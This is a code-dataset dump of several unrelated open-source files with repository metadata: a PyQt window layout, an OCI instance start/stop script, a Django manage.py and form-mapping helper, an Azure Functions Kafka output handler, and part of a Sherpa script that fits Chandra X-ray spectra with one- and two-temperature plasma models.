self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 1)
self.mapTree = QtWidgets.QTreeView(self.dockWidgetContents)
self.mapTree.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.mapTree.sizePolicy().hasHeightForWidth())
self.mapTree.setSizePolicy(sizePolicy)
self.mapTree.setMinimumSize(QtCore.QSize(350, 0))
self.mapTree.setMouseTracking(True)
self.mapTree.setFocusPolicy(QtCore.Qt.StrongFocus)
self.mapTree.setContextMenuPolicy(QtCore.Qt.DefaultContextMenu)
self.mapTree.setAcceptDrops(True)
self.mapTree.setLayoutDirection(QtCore.Qt.LeftToRight)
self.mapTree.setEditTriggers(QtWidgets.QAbstractItemView.DoubleClicked|QtWidgets.QAbstractItemView.EditKeyPressed)
self.mapTree.setProperty("showDropIndicator", False)
self.mapTree.setDragEnabled(False)
self.mapTree.setDragDropOverwriteMode(False)
self.mapTree.setDragDropMode(QtWidgets.QAbstractItemView.NoDragDrop)
self.mapTree.setTextElideMode(QtCore.Qt.ElideRight)
self.mapTree.setObjectName("mapTree")
self.gridLayout.addWidget(self.mapTree, 1, 0, 1, 1)
self.dockWidget.setWidget(self.dockWidgetContents)
MainWindow.addDockWidget(QtCore.Qt.DockWidgetArea(1), self.dockWidget)
self.openMap = QtWidgets.QAction(MainWindow)
self.openMap.setObjectName("openMap")
self.save = QtWidgets.QAction(MainWindow)
self.save.setObjectName("save")
self.action_Compare = QtWidgets.QAction(MainWindow)
self.action_Compare.setObjectName("action_Compare")
self.toolBar.addAction(self.openMap)
self.toolBar.addAction(self.save)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Input Maps"))
self.toolBar.setWindowTitle(_translate("MainWindow", "toolBar"))
self.dockWidget.setWindowTitle(_translate("MainWindow", "Map Input"))
self.label.setText(_translate("MainWindow", "Pixel size (ha)"))
self.inputPixelSize.setText(_translate("MainWindow", "30"))
self.openMap.setText(_translate("MainWindow", "&Open"))
self.openMap.setToolTip(_translate("MainWindow", "Choose a map file"))
self.openMap.setShortcut(_translate("MainWindow", "Ctrl+O"))
self.save.setText(_translate("MainWindow", "&Save"))
self.save.setToolTip(_translate("MainWindow", "Save project"))
self.save.setShortcut(_translate("MainWindow", "Ctrl+S"))
self.action_Compare.setText(_translate("MainWindow", "&Compare"))
self.action_Compare.setToolTip(_translate("MainWindow", "Choose files to compare with"))
self.action_Compare.setShortcut(_translate("MainWindow", "Ctrl+C"))
|
[
"hondasuytu.ht@gmail.com"
] |
hondasuytu.ht@gmail.com
|
6ecccae2ad918d71cfffe40ee69cf978ced6654a
|
fcf7f2cf2eae3dba6d6f931918da32a589b6bc95
|
/src/ipoci.py
|
a51964a68b8ac14158e9a41114b88748fe465a4f
|
[
"MIT"
] |
permissive
|
HenriqueLuizz/inspetor-lestrade
|
4dcaed5bd36b1a3240c503f2a2502861aa70220c
|
eea85c29f1e0f5da4414c1d0cfe222b87015a398
|
refs/heads/master
| 2021-01-01T09:43:22.526286
| 2020-05-23T07:32:17
| 2020-05-23T07:32:17
| 239,224,156
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,421
|
py
|
import json
import subprocess
import common
def resultOCI(d):
if d['status']:
o = json.loads(d['result'])
if 'data' in o:
name = o['data']['display-name']
lifecycle = o['data']['lifecycle-state']
print(f'{name} - {lifecycle}')
return True
else:
print('Falha ao realizar a conexão com o OCI \n' + d['result'])
return False
def check_oci(iids:list):
for iid in iids:
command=f'oci compute instance get --instance-id {iid}'
data = common.run(command)
if data['status']:
resultOCI(data)
return True
else:
print('Falha ao realizar a conexão com o OCI \n' + data['result'])
return False
break
def instancie_oci(iids:list, action='get'):
print(f'OCI operation {action} running... ')
if action.lower() == 'start':
for iid in iids:
data = common.run(f'oci compute instance action --instance-id {iid} --action START')
resultOCI(data)
elif action.lower() == 'stop':
for iid in iids:
data = common.run(f'oci compute instance action --instance-id {iid} --action STOP')
resultOCI(data)
else:
for iid in iids:
data = common.run(f'oci compute instance get --instance-id {iid}')
resultOCI(data)
|
[
"hl.silva89@gmail.com"
] |
hl.silva89@gmail.com
|
6322e51e9bb420079d6de9499a7eae3794cabbad
|
cadd471f2e36725008617a7451166c94723dcd31
|
/Basic/d881.py
|
eb5acd58236a08fa98ad2d380c7badad2f9aceb5
|
[] |
no_license
|
vectominist/ZJ-Solutions-in-Python
|
21b77b543a4c6d48d1d5b817b5421ec30e15192c
|
8b5bbf2a7a0a681c7433b16aa7c6161cae93c644
|
refs/heads/master
| 2020-04-14T02:14:21.935167
| 2019-11-06T06:39:08
| 2019-11-06T06:39:08
| 163,578,899
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 231
|
py
|
import sys
for s in sys.stdin:
num = s.split()
d = int(num[0])
a = [1]
b = [1]
ans = 1
for i in range(1, 50):
a.append(a[-1] + b[-1])
b.append(b[-1] + d)
ans += a[-1]
print(ans)
|
[
"noreply@github.com"
] |
vectominist.noreply@github.com
|
b7a04e8a27c7603e98a032463d2e5828169e75c8
|
8e298335fcd9644b1754daf3682b446bf9351a07
|
/minhaApi/manage.py
|
521739097ff924d16cbd504eebe488eeaaa26e8a
|
[] |
no_license
|
Victormbg/APIs-com-DJango-REST-FRAMEWORK
|
56d1b71efaa8c21eecdffaf8c287a00951f99004
|
cdf7745160edef5c86816fec4349c423a2223e2f
|
refs/heads/master
| 2020-09-11T17:39:44.340696
| 2019-11-16T18:45:20
| 2019-11-16T18:45:20
| 222,140,646
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 806
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "minhaApi.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
[
"victormbg2000@gmail.com"
] |
victormbg2000@gmail.com
|
f40c13d6b6a429e47aaac723a0b9ee9a715abc36
|
40bee13ce471aa704de68ede1ee8579106396ba3
|
/crudstuff/bindmodels.py
|
a92f1576873ed7295be85245a8483d1b9872485e
|
[] |
no_license
|
mikelopez/django-app-skel-crud
|
9029648982ef8881c5859faac60ada4424cac576
|
a01b0eeaffbe12d314eb3f9ab1cd692d6defce34
|
refs/heads/master
| 2020-12-24T16:58:47.140247
| 2013-03-04T21:28:03
| 2013-03-04T21:28:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,383
|
py
|
import importlib
class admin_models:
"""
class wrapper for admin_models data dict
if using as a pluggable app via setup tools, make
sure to override models and forms with
data from your projects settings. if you copied the
application folder local to your project then you can just
edit models and forms here and keep exclude the settings options
"""
model_tables = {
'website': 'Website',
'websitepage': 'WebsitePage',
}
models = {
'website': 'mainweb',
'websitepage': 'mainweb'
}
forms = {
'website': 'WebsiteForm',
'websitepage': 'WebsitePageForm'
}
def __init__(self, settings=None):
"""
Check settings and override self.models and self.forms
data dictionary if variables present in settings
"""
if settings:
try:
if getattr(settings, 'CRUDSTUFF_MODELS'):
self.models = getattr(settings, 'CRUDSTUFF_MODELS')
except AttributeError:
pass
try:
if getattr(settings, 'CRUDSTUFF_FORMS'):
self.forms = getattr(settings, 'CRUDSTUFF_FORMS')
except AttributeError:
pass
try:
if getattr(settings, 'CRUDSTUFF_FORMS'):
self.model_tables = getattr(settings, 'CRUDSTUFF_MODEL_TABLES')
except AttributeError:
pass
def get_app(self, k):
"""
get the app name based on a model
"""
return self.models.get(k)
def get_app_by_model(self, k):
"""
get the app name by the model name so that
we can know which app to look for forms in
"""
if not k in self.models.keys():
return None
return self.models.get(k)
def get_form_by_model(self, k):
"""
get the form class instance by the model name and app name
"""
app = self.get_app_by_model(k)
if not app:
raise Exception('App %s is not found for model %s ' % (app, k))
forms_module = importlib.import_module('%s.forms'%(app))
form = getattr(forms_module, self.forms.get(k))
if not form:
raise Exception('Form %s not found for %s ' % (data.forms.get(k), app))
return form
|
[
"dev@scidentify.info"
] |
dev@scidentify.info
|
16e61330ddfbe4a840f6d76cc9e7ef9e81e18c5b
|
31b4bfcf79600d968f061ad9e25e9224aaa5fb1e
|
/test/Microsoft.Azure.WebJobs.Extensions.Kafka.LangEndToEndTests/FunctionApps/python/Confluent/MultiHttpTriggerKafkaOutput/__init__.py
|
cb8b516d26ba3047bb2a311083325f789aa53727
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
Azure/azure-functions-kafka-extension
|
cd640ac94cd995d93942eca76851e7399e9eaaf8
|
59f93fb60603a7428f6975b7f7836ece78e8cd19
|
refs/heads/dev
| 2023-08-18T13:19:50.603255
| 2023-07-28T09:17:10
| 2023-07-28T09:17:10
| 174,426,959
| 102
| 73
|
MIT
| 2023-08-26T01:07:32
| 2019-03-07T22:03:17
|
C#
|
UTF-8
|
Python
| false
| false
| 837
|
py
|
import logging
import typing
from azure.functions import KafkaEvent, Out, HttpRequest, HttpResponse
import json
def main(req: HttpRequest, out: Out[str] ) -> HttpResponse:
logging.info('Python HTTP trigger function processed a request.')
message = req.params.get('message')
message1 = req.params.get('message1')
message2 = req.params.get('message2')
if message and message1 and message2:
messagesarr = [message, message1, message2]
out.set(json.dumps(messagesarr))
return HttpResponse(f"Message received: {message} {message1} {message2}. The message transfered to the kafka broker.")
else:
return HttpResponse(
"This HTTP triggered function executed successfully. Pass a name in the query string for a personalized response.",
status_code=200
)
|
[
"kkariya@microsoft.com"
] |
kkariya@microsoft.com
|
5e8a1d01a2d01078822c6908247a5b831c92e330
|
81f91106bf9a748a3eb257127e7fc342aecd4b9f
|
/fit_spectra.py
|
d6f58870b1fda1985fdcc83ac03247d93a4be6d8
|
[] |
no_license
|
martijndevries/Xmaps
|
a3dae7dbd1656874750dc0db5feb1cc859abf6b0
|
f56e5e3a5f8355b541a09f842a56f056dd5e01bc
|
refs/heads/master
| 2021-01-17T23:09:54.810778
| 2013-11-27T15:21:51
| 2013-11-27T15:21:51
| 20,330,213
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 59,287
|
py
|
"""
Fits a model to Chandra spectra.
This module can use the output of extract_spectra.py to fit
a model to the spectra. If run as a script, multiple spectra
may be specfied by giving a text file that lists the
spectra as an argument with '@' prepended.
Version 0.6: 3/5/2011 - Updated for Ciao 4.3
Version 0.7: 1/11/2013 - Updated for Ciao 4.5
"""
import os
import sys
import subprocess
import numpy
import multiprocessing
import threading
# Check that CIAO was initialized
if os.environ.get("CALDB") == None:
sys.exit('Please initalize CIAO before running this script.')
from sherpa.astro.ui import *
from pychips import *
import gc
def call_sherpa_1T(spectra, redshift, nH_Gal, kT_guess, Ab_guess, root, lo_energy='0.5', hi_energy='7.0', plasma_model='mekal', min_counts=100, binning=None, reg_num_to_start=0, fix_nH_Gal=True, fix_abund=False, find_errors=False, make_plots=False, min_cnt_rate_ratio=0.3, clobber=False):
"""
Calls Sherpa to fit a single-temperature model to one or more spectra.
Inputs: spectra - list of input PI files. Can be a list of
lists if there is more than one observation:
e.g., [spectra_obs1, spectra_obs2], where
spectra_obs1 = ['reg1.pi, 'reg2.pi', ...]
redshift - redshift of source
nH_Gal - Galactic N_H (10^22 cm^-2)
kT_guess - initial guess for temperature (keV)
Ab_guess - initial guess for abundance
root - root of output file with fit results
lo_energy - lower bound of fitted energy range (keV)
hi_energy - upper bound of fitted energy range (keV)
plasma_model - specifies the plasma model (mekal or apec)
min_counts - minimum number of total counts required for
fitting
binning - number of counts per bin for fitting
reg_num_to_start - number to start from when numbering the
fit results by region
fix_nH_Gal - if True, freezes nH_Gal
fix_abund - if True, freezes abundance
find_errors - if True, calculates errors
make_plots - if True, make a plot of fit for each region
min_cnt_rate_ratio - min ratio (relative to max cnt rate
in region) below which to discard
observations
clobber - if True, overwrite existing file
Outputs: The fits results are saved to the file:
root+'_wabs_'+plasma_model+'.dat'
"""
if isinstance(spectra, str): spectra = [spectra]
if isinstance(spectra[0], str):
nreg = 1 # number of regions
else:
nreg = len(spectra[0]) # number of regions
nobs = len(spectra) # number of observations
fit_results_file = root + '_wabs_' + plasma_model + '.dat'
ccolor = ["blue", "gold", "cyan", "forest", "darkred", "red", "gray", "green", "magenta", "orange", "black", "yellow", "turquoise", "firebrick", "brown", "azure", "honeydew", "lime", "mistyrose", "navy"]
if type(redshift) == str: redshift = float(redshift)
if type(nH_Gal) == str: nH_Gal = float(nH_Gal)
if type(kT_guess) == str: kT_guess = float(kT_guess)
if type(Ab_guess) == str: Ab_guess = float(Ab_guess)
if type(lo_energy) == str: lo_energy = float(lo_energy)
if type(hi_energy) == str: hi_energy = float(hi_energy)
if os.path.isfile(fit_results_file) == False or clobber == True:
results_file = open(fit_results_file, "w")
results_file.write('# Fit results for wabs*'+plasma_model+' (zeros indicate that no fitting was performed)\n')
results_file.write('# Reg_no. kT kT_loerr kT_hierr Z Z_loerr Z_hierr norm norm_loerr norm_hierr nH_Gal nH_loerr nH_hierr red_chisq total_counts num_bins\n')
for i in range(nreg):
print('\n')
clean() # reset everything
gc.collect() # collect garbage every step to avoid memory problems when fitting a large number (>10) of observations simultaneously
nobs_current_reg = 0 # number of valid spectra for this region
if nobs > 1:
cnts = numpy.zeros(nobs) # array to store counts
max_rate = numpy.zeros(nobs) # max count rate [counts/s/keV]
src_id = 0 # index of source id
good_src_ids = numpy.zeros(nobs, dtype=int) - 1
for j in range(nobs):
pi_file = spectra[j][i]
pi_root = os.path.splitext(pi_file)[0]
if pi_root[-3:] == 'grp': # check if grouped or not
pi_root = pi_root[:-4]
bgd_file = pi_root[:-3] + 'bgd.pi'
wrmf_file = pi_root + '.wrmf'
warf_file = pi_root + '.warf'
pi_file_exists = os.path.isfile(pi_file)
bgd_file_exists = os.path.isfile(bgd_file)
wrmf_file_exists = os.path.isfile(wrmf_file)
warf_file_exists = os.path.isfile(warf_file)
if pi_file_exists and bgd_file_exists and wrmf_file_exists and warf_file_exists: # make sure all required files exist before trying to load data
nobs_current_reg += 1
load_pha(src_id, pi_file)
if binning != None:
print('Grouping to ' + str(binning) + ' counts...')
group_counts(src_id, binning)
ignore_id(src_id, 0.0, lo_energy)
ignore_id(src_id, hi_energy, None)
cnts[j] = calc_data_sum(lo_energy, hi_energy, src_id) # get counts in filtered dataset
print('Counts for obs '+str(j+1)+': '+str(int(cnts[j])))
cnt_rate = get_rate(src_id, filter=True)
if len(cnt_rate) == 0: # when few counts (<50), get_rate can return zero-length array
max_rate[j] = 0.0
else:
max_rate[j] = numpy.max(cnt_rate)
subtract(src_id) # subtract the background
if src_id == 0:
if plasma_model == 'mekal':
set_source(src_id, xswabs.abs1 * xsmekal.plsm1)
if plasma_model == 'apec':
set_source(src_id, xswabs.abs1 * xsapec.plsm1)
else:
set_source(src_id, abs1 * plsm1)
good_src_ids[j] = src_id
src_id += 1
# Filter out ignored observations
good_src_ids_indx = numpy.where(good_src_ids >= 0)
good_src_ids = good_src_ids[good_src_ids_indx]
max_rate = max_rate[good_src_ids_indx]
cnts = cnts[good_src_ids_indx]
# If min_cnt_rate_ratio is specified, check whether the count rate
# of any observation falls below the limit.
if min_cnt_rate_ratio != None:
max_rate_overall = numpy.max(max_rate)
max_rate_ratios = max_rate / max_rate_overall
lowcr_src_ids_indx = numpy.where(max_rate_ratios < min_cnt_rate_ratio)
highcr_src_ids_indx = numpy.where(max_rate_ratios >= min_cnt_rate_ratio)
if len(lowcr_src_ids_indx) > 0:
lowcr_src_ids = good_src_ids[lowcr_src_ids_indx]
good_src_ids = good_src_ids[highcr_src_ids_indx]
cnts = cnts[highcr_src_ids_indx]
for b in range(len(lowcr_src_ids)):
print('Removing observation '+str(lowcr_src_ids[b]+1)+' (dataset '+str(lowcr_src_ids[b])+') for low count rate.')
delete_data(lowcr_src_ids[b])
nobs_current_reg -= 1
if nobs == 1:
pi_file = spectra[i]
pi_root = os.path.splitext(pi_file)[0]
if pi_root[-3:] == 'grp': # check if grouped or not
pi_root = pi_root[:-4]
bgd_file = pi_root[:-3] + 'bgd.pi'
wrmf_file = pi_root + '.wrmf'
warf_file = pi_root + '.warf'
pi_file_exists = os.path.isfile(pi_file)
bgd_file_exists = os.path.isfile(bgd_file)
wrmf_file_exists = os.path.isfile(wrmf_file)
warf_file_exists = os.path.isfile(warf_file)
if pi_file_exists and bgd_file_exists and wrmf_file_exists and warf_file_exists: # make sure all required files exist before trying to load data
nobs_current_reg += 1
valid_obs_nums.append(1)
load_pha(pi_file)
if binning != None:
group_counts(src_id, binning)
if plasma_model == 'mekal':
set_source(xswabs.abs1 * xsmekal.plsm1)
if plasma_model == 'apec':
set_source(xswabs.abs1 * xsapec.plsm1)
ignore(0.0, lo_energy)
ignore(hi_energy, None)
cnts[0] = calc_data_sum(lo_energy, hi_energy) # get counts in filtered dataset
subtract()
# Check whether total counts >= min_counts.
# If so, fit; if not, skip the fit
totcnts = numpy.sum(cnts)
if totcnts >= min_counts:
if nobs_current_reg > 1:
print('\nFitting '+str(nobs_current_reg)+' spectra in region '+str(i + reg_num_to_start)+' ('+str(int(totcnts))+' counts total)...')
else:
print('\nFitting 1 spectrum in region '+str(i + reg_num_to_start)+' ('+str(int(totcnts))+' counts total)...')
abs1.nH = nH_Gal
if fix_nH_Gal:
freeze(abs1.nH)
else:
thaw(abs1.nH)
plsm1.kt = kT_guess
thaw(plsm1.kt)
plsm1.abundanc = Ab_guess
if fix_abund:
freeze(plsm1.abundanc)
else:
thaw(plsm1.abundanc)
plsm1.redshift = redshift
freeze(plsm1.redshift)
fit()
fit_result = get_fit_results()
red_chi2 = fit_result.rstat
num_bins = fit_result.numpoints
if fix_nH_Gal:
nH = nH_Gal
kT = fit_result.parvals[0]
if fix_abund:
Z = Ab_guess
norm = fit_result.parvals[1]
else:
Z = fit_result.parvals[1]
norm = fit_result.parvals[2]
else:
nH = fit_result.parvals[0]
kT = fit_result.parvals[1]
if fix_abund:
Z = Ab_guess
norm = fit_result.parvals[2]
else:
Z = fit_result.parvals[2]
norm = fit_result.parvals[3]
del fit_result
if make_plots:
if len(good_src_ids) > 10:
nplots = numpy.ceil(len(good_src_ids) / 10.0)
else:
nplots = 1
for plot_num in range(nplots):
start_indx = 0 + numpy.floor(len(good_src_ids) / nplots) * plot_num
if plot_num == nplots - 1:
end_indx = len(good_src_ids)
else:
end_indx = numpy.floor(len(good_src_ids) / nplots) * (plot_num + 1.0)
clear() # delete any plot windows
add_window()
#add_window(["display", False])
set_preference("frame.transparency", "true")
#set_preference("window.display", "false")
label_ypos = 0.2
ccolor_indx = 0
for p in good_src_ids[start_indx:end_indx]:
plot_fit_delchi(p, overplot=True, clearwindow=False)
log_scale(X_AXIS)
set_current_plot("plot1")
limits(X_AXIS, 0.1, 10) # keV
limits(Y_AXIS, 1E-7, 0.2)
log_scale(Y_AXIS)
set_curve("crv1", ["symbol.color", ccolor[ccolor_indx], "err.color", ccolor[ccolor_indx]])
set_curve("crv2", ["line.color", ccolor[ccolor_indx], "err.color", ccolor[ccolor_indx]])
label_ypos = label_ypos / 2.0
add_label(4.0, label_ypos, "obs"+str(p+1))
set_label(["color", ccolor[ccolor_indx]])
set_current_plot("plot2")
limits(X_AXIS, 0.1, 10) # keV
limits(Y_AXIS, -5.0, 5.0)
set_curve(["symbol.color", ccolor[ccolor_indx], "err.color", ccolor[ccolor_indx]])
set_plot_xlabel("Energy (keV)")
set_plot_ylabel("Sigma")
ccolor_indx += 1
set_current_plot("plot1")
set_plot_title("Fit for region "+str(i+reg_num_to_start))
set_plot_ylabel("Counts s^{-1} keV^{-1}")
if nplots > 1:
fit_plot_file = "reg" + str(i+reg_num_to_start) + "_plot" + str(plot_num) + "_1T_fit.pdf"
else:
fit_plot_file = "reg" + str(i+reg_num_to_start) + "_1T_fit.pdf"
print_window(fit_plot_file, ["orientation", "portrait", "clobber", True])
if find_errors:
covar()
covar_result = get_covar_results()
if fix_nH_Gal:
nH_loerr = 0.0
nH_hierr = 0.0
kT_loerr = covar_result.parmins[0]
kT_hierr = covar_result.parmaxes[0]
if fix_abund:
Z_loerr = 0.0
Z_hierr = 0.0
norm_loerr = covar_result.parmins[1]
norm_hierr = covar_result.parmaxes[1]
else:
Z_loerr = covar_result.parmins[1]
Z_hierr = covar_result.parmaxes[1]
norm_loerr = covar_result.parmins[2]
norm_hierr = covar_result.parmaxes[2]
else:
nH_loerr =covar_result.parmins[0]
kT_loerr = covar_result.parmins[1]
nH_hierr = covar_result.parmaxes[0]
kT_hierr = covar_result.parmaxes[1]
if fix_abund:
Z_loerr = 0.0
Z_hierr = 0.0
norm_loerr = covar_result.parmins[2]
norm_hierr = covar_result.parmaxes[2]
else:
Z_loerr = covar_result.parmins[2]
Z_hierr = covar_result.parmaxes[2]
norm_loerr = covar_result.parmins[3]
norm_hierr = covar_result.parmaxes[3]
del covar_result
# Check for failed errors (= None) and set them to +/- best-fit value
if not fix_nH_Gal:
if nH_loerr == None: nH_loerr = -nH
if nH_hierr == None: nH_hierr = nH
if kT_loerr == None: kT_loerr = -kT
if kT_hierr == None: kT_hierr = kT
if not fix_abund:
if Z_loerr == None: Z_loerr = -Z
if Z_hierr == None: Z_hierr = Z
if norm_loerr == None: norm_loerr = -norm
if norm_hierr == None: norm_hierr = norm
else:
kT_loerr = 0.0
Z_loerr = 0.0
nH_loerr = 0.0
norm_loerr = 0.0
kT_hierr = 0.0
Z_hierr = 0.0
nH_hierr = 0.0
norm_hierr = 0.0
else: # if total counts < min_counts, just write zeros
print('\n Warning: no fit performed for for region '+str(i + reg_num_to_start)+':')
if nobs > 1:
print(' Spectra have insufficient counts after filtering or do not exist.')
else:
print(' Spectrum has insufficient counts after filtering or does not exist.')
print(' --> All parameters for this region set to 0.0.')
kT = 0.0
Z = 0.0
nH = 0.0
norm = 0.0
kT_loerr = 0.0
Z_loerr = 0.0
nH_loerr = 0.0
norm_loerr = 0.0
kT_hierr = 0.0
Z_hierr = 0.0
nH_hierr = 0.0
norm_hierr = 0.0
red_chi2 = 0.0
num_bins = 0
results_file.write('%7r %7.4f %7.4f %7.4f %7.4f %7.4f %7.4f %6.4e %6.4e %6.4e %7.4f %7.4f %7.4f %7.4f %8.1f %8r\n' % (i+reg_num_to_start, kT, kT_loerr, kT_hierr, Z, Z_loerr, Z_hierr, norm, norm_loerr, norm_hierr, nH, nH_loerr, nH_hierr, red_chi2, totcnts, num_bins) )
results_file.close()
# Finally, make sure all regions have an entry in the fit results file
# (this shouldn't be needed, but just in case...)
dtype = {'names': ('reg_id', 'kT', 'kT_lo', 'kT_hi', 'Z', 'Z_lo', 'Z_hi', 'norm', 'norm_lo', 'norm_hi', 'nH', 'nH_lo', 'nH_hi', 'chi2', 'totcnts', 'nbins'), 'formats': ('i4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'i4')}
data = numpy.loadtxt(fit_results_file, dtype=dtype)
reg_num = data["reg_id"]
missing_regs = []
n_missing = 0
for i in range(len(reg_num)):
if int(reg_num[i]) != i + reg_num_to_start + n_missing:
missing_regs.append(i + reg_num_to_start + n_missing)
n_missing += 1
if n_missing > 0:
results_file = open(fit_results_file, "a") # append missing regions
for i in range(n_missing):
results_file.write('%7r %7.4f %7.4f %7.4f %7.4f %7.4f %7.4f %6.4e %6.4e %6.4e %7.4f %7.4f %7.4f %7.4f %8.1f %8r\n' % (missing_regs[i]+reg_num_to_start, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0) )
else:
print('\n Output file ('+fit_results_file+') exists and clobber = False.')
def call_sherpa_2T(spectra, redshift, nH_Gal, kT_guess, Ab_guess, root, lo_energy='0.5', hi_energy='7.0', plasma_model='mekal', min_counts=100, binning=None, reg_num_to_start=0, fix_nH_Gal=True, fix_abund=False, find_errors=False, make_plots=False, min_cnt_rate_ratio=0.3, clobber=False):
"""
Calls Sherpa to fit a two-temperature model to one or more spectra.
Inputs: spectra - list of input PI files. Can be a list of
lists if there is more than one observation:
e.g., [spectra_obs1, spectra_obs2], where
spectra_obs1 = ['reg1.pi, 'reg2.pi', ...]
redshift - redshift of source
nH_Gal - Galactic N_H (10^22 cm^-2)
kT_guess - initial guess for temperature (keV)
Ab_guess - initial guess for abundance
root - root of output file with fit results
lo_energy - lower bound of fitted energy range (keV)
hi_energy - upper bound of fitted energy range (keV)
plasma_model - specifies the plasma model (mekal or apec)
min_counts - minimum number of total counts required for
fitting
binning - number of counts per bin for fitting
reg_num_to_start - number to start from when numbering the
fit results by region
fix_nH_Gal - if True, freezes nH_Gal
fix_abund - if True, freezes abundance
find_errors - if True, calculates errors
make_plots - if True, make a plot of fit for each region
min_cnt_rate_ratio - min ratio (relative to max cnt rate
in region) below which to discard
observations
clobber - if True, overwrite existing file
Outputs: The fits results are saved to the file:
root+'_wabs_2'+plasma_model+'.dat'
"""
if isinstance(spectra, str): spectra = [spectra]
if isinstance(spectra[0], str):
nreg = 1 # number of regions
else:
nreg = len(spectra[0]) # number of regions
nobs = len(spectra) # number of observations
fit_results_file = root + '_wabs_2' + plasma_model + '.dat'
ccolor = ["blue", "gold", "cyan", "forest", "darkred", "red", "gray", "green", "magenta", "orange", "black", "yellow", "turquoise", "firebrick", "brown", "azure", "honeydew", "lime", "mistyrose", "navy"]
if type(redshift) == str: redshift = float(redshift)
if type(nH_Gal) == str: nH_Gal = float(nH_Gal)
if type(kT_guess) == str: kT_guess = float(kT_guess)
if type(Ab_guess) == str: Ab_guess = float(Ab_guess)
if type(lo_energy) == str: lo_energy = float(lo_energy)
if type(hi_energy) == str: hi_energy = float(hi_energy)
if os.path.isfile(fit_results_file) == False or clobber == True:
results_file = open(fit_results_file, "w")
results_file.write('# Fit results for wabs*'+plasma_model+' (zeros indicate that no fitting was performed)\n')
results_file.write('# Reg_no. kT1 kT1_loerr kT1_hierr Z1 Z1_loerr Z1_hierr norm1 norm1_loerr norm1_hierr kT2 kT2_loerr kT2_hierr Z2 Z2_loerr Z2_hierr norm2 norm2_loerr norm2_hierr nH_Gal nH_loerr nH_hierr red_chisq total_counts num_bins\n')
if make_plots:
add_window(["display", False])
for i in range(nreg):
print('\n')
clean() # reset everything
gc.collect() # collect garbage every step to avoid memory problems when fitting a large number (>10) of observations simultaneously
nobs_current_reg = 0 # number of valid spectra for this region
if nobs > 1:
cnts = numpy.zeros(nobs) # array to store counts
max_rate = numpy.zeros(nobs) # max count rate [counts/s/keV]
src_id = 0 # index of source id
good_src_ids = numpy.zeros(nobs, dtype=int) - 1
for j in range(nobs):
pi_file = spectra[j][i]
pi_root = os.path.splitext(pi_file)[0]
if pi_root[-3:] == 'grp': # check if grouped or not
pi_root = pi_root[:-4]
bgd_file = pi_root[:-3] + 'bgd.pi'
wrmf_file = pi_root + '.wrmf'
warf_file = pi_root + '.warf'
pi_file_exists = os.path.isfile(pi_file)
bgd_file_exists = os.path.isfile(bgd_file)
wrmf_file_exists = os.path.isfile(wrmf_file)
warf_file_exists = os.path.isfile(warf_file)
if pi_file_exists and bgd_file_exists and wrmf_file_exists and warf_file_exists: # make sure all required files exist before trying to load data
nobs_current_reg += 1
load_pha(src_id, pi_file)
if binning != None:
print('Grouping to ' + str(binning) + ' counts...')
group_counts(src_id, binning)
ignore_id(src_id, 0.0, lo_energy)
ignore_id(src_id, hi_energy, None)
cnts[j] = calc_data_sum(lo_energy, hi_energy, src_id) # get counts in filtered dataset
print('Counts for obs '+str(j+1)+': '+str(int(cnts[j])))
cnt_rate = get_rate(src_id, filter=True)
if len(cnt_rate) == 0: # when few counts (<50), get_rate can return zero-length array
max_rate[j] = 0.0
else:
max_rate[j] = numpy.max(cnt_rate)
subtract(src_id) # subtract the background
if src_id == 0:
if plasma_model == 'mekal':
set_source(src_id, xswabs.abs1 * (xsmekal.plsm1 + xsmekal.plsm2))
if plasma_model == 'apec':
set_source(src_id, xswabs.abs1 * (xsapec.plsm1 + xsapec.plsm2))
else:
set_source(src_id, abs1 * (plsm1 + plsm2))
good_src_ids[j] = src_id
src_id += 1
# Filter out ignored observations
good_src_ids_indx = numpy.where(good_src_ids >= 0)
good_src_ids = good_src_ids[good_src_ids_indx]
max_rate = max_rate[good_src_ids_indx]
cnts = cnts[good_src_ids_indx]
# If min_cnt_rate_ratio is specified, check whether the count rate
# of any observation falls below the limit.
if min_cnt_rate_ratio != None:
max_rate_overall = numpy.max(max_rate)
max_rate_ratios = max_rate / max_rate_overall
lowcr_src_ids_indx = numpy.where(max_rate_ratios < min_cnt_rate_ratio)
highcr_src_ids_indx = numpy.where(max_rate_ratios >= min_cnt_rate_ratio)
if len(lowcr_src_ids_indx) > 0:
lowcr_src_ids = good_src_ids[lowcr_src_ids_indx]
good_src_ids = good_src_ids[highcr_src_ids_indx]
cnts = cnts[highcr_src_ids_indx]
for b in range(len(lowcr_src_ids)):
print('Removing observation '+str(lowcr_src_ids[b]+1)+' (dataset '+str(lowcr_src_ids[b])+') for low count rate.')
delete_data(lowcr_src_ids[b])
nobs_current_reg -= 1
if nobs == 1:
pi_file = spectra[i]
pi_root = os.path.splitext(pi_file)[0]
